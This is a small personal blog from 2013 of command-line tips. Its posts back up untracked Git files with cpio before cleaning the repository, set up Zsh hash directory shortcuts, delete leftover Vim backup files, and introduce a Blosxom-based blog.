    There may be times when you find your Git repository burdened with scads of untracked files left aside while twiddling, testing bug patches, or what-have-youse.

    For the especially scatter-brained among us, these things can go unchecked until a day when the useful bits of a git status scroll off the screen due to utterly unimportant stuff. Well, hopefully unimportant.

    But we’d better not just cleave away everything that we haven’t checked in. You wonder:
    What if there’s something important in one of those files?

    You are so right!

    Let’s fix this!

    Firstly, we want a solution that’s reproducible. Only want to invent this wheel once, right?

    Let’s begin with the play-by-play:

    Git, we want a list of what isn’t tracked: git ls-files -o --exclude-standard -z

    We’ll back these files up in our home directory (~), using CPIO but we don’t want a poorly-named directory or finding anything will become its own obstacle. So we’ll take use the current date (date +%Y-%m-%d), directory (pwd) and branch we’re using (git branch) and we’ll twist all of it into a meaningful, but appropriate, directory name using sed. git ls-files -o --exclude-standard -z | cpio -pmdu ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/

    Then Tell Git to remove the untracked files and directories: git clean -d -f

    Ahhhh… Much better. Is there anything left out? Perhaps. What if we decide that moving these files away was a mistake? The kind of mistake that breaks something. If we realize right away, it’s easily-enough undone. But what if we break something and don’t notice for a week or two? It’d probably be best if we had an automated script to put things back the way they were. Let’s do that.

    Simple enough. We’ll just take the opposite commands and echo them into a script to be used in case of emergency.

    Create the restore script (restore.sh), to excuse faulty memory: echo "(cd ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/; find . -type f \( ! -iname 'restore.sh' \) | cpio -pdm `pwd`)" > ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/restore.sh

    Make the restore script executable: chmod u+x ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/restore.sh

    Lastly, the magic, compressed into one line that will stop if any command does not report success: a='untracked-git-backup-'`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`; git ls-files -o --exclude-standard -z | cpio -pmdu ~/$a/ && git clean -d -f && echo "(cd ~/$a/; find . -type f \( ! -iname 'restore.sh' \) | cpio -pdm `pwd`)" > ~/$a/restore.sh && chmod +x ~/$a/restore.sh; unset a

    Tags: , , , ,
    Permalink: 20130515.git.untracked.mess

    Mon, 13 May 2013

    Zsh and hash

    Documentation for this one seems a bit hard to come by but it is one of the things I love about Zsh.

    I’ve seen many .bashrc files that have things like:
    alias www='cd /var/www'
    alias music='cd /home/j0rg3/music'

    And that’s a perfectly sensible way to make life a little easier, especially if the paths are very long.

    In Zsh, however, we can use the hash command and the shortcut we get from it works fully as the path. Other words, using the version above, if we want to edit ‘index.html’ in the ‘www’ directory, we would have to issue the shortcut to get there and then edit the file, in two steps:
    > www
    > vim index.html

    The improved version in .zshrc would look like:
    hash www=/var/www
    hash -d www=/var/www

    Then, at any time, you can use tilde (~) and your shortcut in place of path.
    > vim ~www/index.html

    Even better, it integrates with Zsh’s robust completions so you can, for example, type cd ~www/ and then use the tab key to cycle through subdirectories and files.

    On this system, I’m using something like this:
    hash posts=/home/j0rg3/weblog/posts
    hash -d posts=/home/j0rg3/weblog/posts

    Then we can make a function to create a new post, to paste into .zshrc. Since we want to be able to edit and save, without partial posts becoming visible, while we are working, we’ll use an extra .tmp extension at the end:
    post() { vim ~posts/`date +%Y-%m`/`date +%Y%m%d`.$1.txt.tmp }

    [ In-line date command unfamiliar? See earlier explanation ]

    But, surely there is going to be a point when we need to save a post and finish it later. For now, let’s assume that only a single post will be in limbo at any time. We definitely don’t want to have to remember the exact name of the post — and we don’t want to have hunt it down every time.

    We can make those things easier like this:
    alias resume="vim `find ~posts/ -name '*.txt.tmp'`"

    Now, we can just enter resume and the system will go find the post we were working on and open it up for us to finish. The file will need the extension renamed from .txt.tmp to only .txt to publish the post but, for the sake of brevity, we’ll think about that (and having multiple posts in editing) on another day.

    Tags: , , , ,
    Permalink: 20130513.zsh.and.hash

    Wed, 08 May 2013

    Deleting backup files left behind by Vim

    It’s generally a great idea to have Vim keep backups. Once in awhile, they can really save your bacon.

    The other side of that coin, though, is that they can get left behind here and there, eventually causing aggravation.

    Here’s a snippet to find and eliminate those files from the current directory down:

    find ./ -name '*~' -exec rm '{}' \; -print -or -name ".*~" -exec rm {} \; -print
    This uses find from the current directory down (./) to execute an rm statement on all files with an extension ending in tilde (~)
    Alternatively, you could just store your backups elsewhere. In Vim, use :help backupdir for more information.

    Tags: , , , ,
    Permalink: 20130508.delete.vim.backups

    Tue, 07 May 2013

    Welcome, traveler.

    Thanks for visiting my little spot on the web. This is a Blosxom ‘blog which, for those who don’t know, is a CGI written in Perl using the file-system (rather than a database).

    To the CLI-addicted, this is an awesome little product. Accepting, of course, that you’re going to get under the hood if you’re going to make it the product you want. After some modules and hacking, I’m pleased with the result.

    My posts are just text files, meaning I start a new one like: vim ~posts/`date +%Y%m%d`.brief.subject.txt

    Note: the back-ticks (`) tell the system that you want to execute the command between ticks, and dynamically insert its output into the command. In this case, the command date with these parameters:
    1. (+) we’re going to specify a format
    2. (%Y) four-digit year
    3. (%m) two-digit month
    4. (%d) two-digit day
    That means the command above will use Vim to edit a text file named ‘20130507.brief.subject.txt’ in the directory I have assigned to the hash of ‘posts’. (using hash this way is a function of Zsh that I’ll cover in another post)

    In my CLI-oriented ‘blog, I can sprinkle in my own HTML or use common notation like wrapping a word in underscores to have it underlined, forward-slashes for italics and asterisks for bold.

    Toss in a line that identifies tags and, since Perl is the beast of Regex, we pick up the tags and make them links, meta-tags, etc.

    Things here are likely to change a lot at first, while I twiddle with CSS and hack away at making a Blosxom that perfectly fits my tastes — so don’t be too alarmed if you visit and things look a tad wonky. It just means that I’m tinkering.

    Once the saw-horses have been tucked away, I’m going to take the various notes I’ve made during my years in IT and write them out, in a very simple breakdown, aimed at sharing these with people who know little about how to negotiate the command line. The assumption here is that you have an interest in *nix/BSD. If you’ve that and the CLI is not a major part of your computing experience, it probably will be at some point. If you’re working on systems remotely, graphical interfaces often just impede you.

    Once you’ve started working on remote machines, the rest is inevitable. You can either remember how to do everything two ways, through a graphical interface and CLI — or just start using the CLI for everything.

    So let’s take a little journey through the kinds of things that make me love the CLI.

    Tags: , , , , , , , , ,
    Permalink: 20130507.greetings